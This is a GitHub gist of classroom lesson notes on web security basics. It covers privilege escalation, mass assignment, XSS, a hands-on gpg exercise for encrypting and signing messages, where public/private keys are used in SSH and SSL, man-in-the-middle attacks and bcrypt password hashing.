Skip to content

Instantly share code, notes, and snippets.

@BobGu

BobGu/basics_of_security.md

Last active May 25, 2017 13:53
Show Gist options
  • Save BobGu/92a929dc29905bf04397515fa0ac206a to your computer and use it in GitHub Desktop.
Save BobGu/92a929dc29905bf04397515fa0ac206a to your computer and use it in GitHub Desktop.
Download ZIP
Raw
basics_of_security.md

Review of concepts(10 mins)

  • Privilege Escalation
  • Has to deal with authorization
  • I can do things that I'm not supposed to.
  • How would this apply to a multi-tenant ecommerce application?

  • Mass Assignment Vulnerabilities

    • Example in Rails?
    • A whitelist of attributes someone can assign to an object.
    • Examples
      • I want to change the username and password of a user so I can gain access to their credit card.
      • Privlege escalation, change my role to super-admin so I can do what I want in the application.

  • XSS or Cross Site Scripting

    • When you allow someone to inject runnable code into your application.
    • Happens often through users injecting JavaScript throught HTML
    • Luckily newer version of Rails automatically escape HTML for you
    • Escape formatter

Public/Private Keys(30-50 minutes)

  • Overview of how public/private keys work
    • Whiteboard something
    • Give Verifi example
  • Drop cheatsheet gist in slack [https://gist.github.com/BobGu/af9b3df39dfbe822da86a2c6e7872133]
  • First thing we are going to do is create a public/private key pair on our computer.
    • Download gpg by running brew install gpg
    • gpg --generate-key to generate your key
      • it will ask you to fill out a bunch of info, write this info down
      • Remember public/private key pairs only work with each other! Thats why they are generated together.
  • Courtney's public key is obviously public, she sends her public key to anyone that wants to send her a secure message
    • Have them look at her public key that shes created.
    • Now she will export her public key, and post it in slack.
      • To export your public key use this command gpg --output name_of_file.gpg --export email_of_user
    • Now the fun part is we are all going to send encrypted messages to Courtney
      • First we have to import her public key
        • gpg --import name_of_file.gpg
        • gpg will automatically verify the owner of this key is courtney, you should see some output like this
      • Next we will encrypt a simple text file using Courtney's public key.
        • create a text file
        • To encrypt with Courtney's public key
        • gpg --recipient courtney@example.com --output encrypted_file.gpg --encrypt name_of_file.txt
    • Now Courtney will decrypt these messages using her private key
      • Send Courtney the encypted messages
      • Now she will decrypt these messages
        • To decrypt a message
        • gpg --output name_of_file.txt --decrypt encypted_file.gpg
      • Then look at the file! Use cat name_of_file.txt or vim name_of_file.txt to see the contents!
  • Get in pairs, group of three
  • One person is going to be receiving the encrypted messages
  • The other person is going to be encrypting and singing the messages
  • Signatures * It is a way of verifying a document has come from the person you expect. * Think like in the old days where people would have wax seals on their envelopes. Hard to fake where the message came from unless someone jacked the seal.
    • To sign a file, the signer is going to use their private key
    • gpg --recipient address@example.com --encrypt --sign name_of_file.txt
    • The signing key is chosen by default or can be set explicitly using the --local-user and --default-key options. * The decryption step happens the same way.
      • gpg --output name_of_file.txt --decrypt encypted_file.gpg
      • You should see some output in your command line like this
        gpg: encrypted with 2048-bit RSA key, ID 50CF34BACCE23953, created 2017-05-19 "NateDog natedog@example.com" Hello World! gpg: Signature made Mon May 22 14:53:12 2017 PDT gpg: using RSA key 889B4A169E5F3886403B554B3A4C5633C74F5CE5 gpg: Good signature from "Robert Gu robert@example.com" [ultimate]

Where are public/private keys used

  • In PGP(Pretty good privacy)
    • Give an example from real job
  • SSH(Secure Shell)
    • SSH key based authentication
    • GitHub uses it
      • Have them go to their ~/.ssh.id_rsa.pub
      • This is the public key that they put on GitHub so the key based authentication will work
  • SSL(Secure socket layer)
    • It keeps data encrypted until it reaches the server
    • Authenticate the server to the client through a certificate
      • A certificate has a public key(which you use the encrypt the message) and a private key which the website you are visiting uses to decrypt that message
    • A certificate authority creates a second private/public key pair. They sign these certificates with their private keys. The certificate authority then includes their public key, so we can verify the signature is from them.

Man in the middle(10-15 minutes)

* The person doing this is looking to monitor traffic in some way
  * What is some information that belongs to a request which I can monitor?
* MiTM attack on the high level.

Password security(10-15 mins)

  • Brute Force
  • bcrypt
    • Hash - one way
    • Salt
    • Rainbow tables
    • Bcrypt is slow

CFU(5-10 mins)

  • What is a public/private key pair?
  • How are public private keys used?
  • What is a man in the middle attack?
  • Why do you hash and salt your passwords?
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment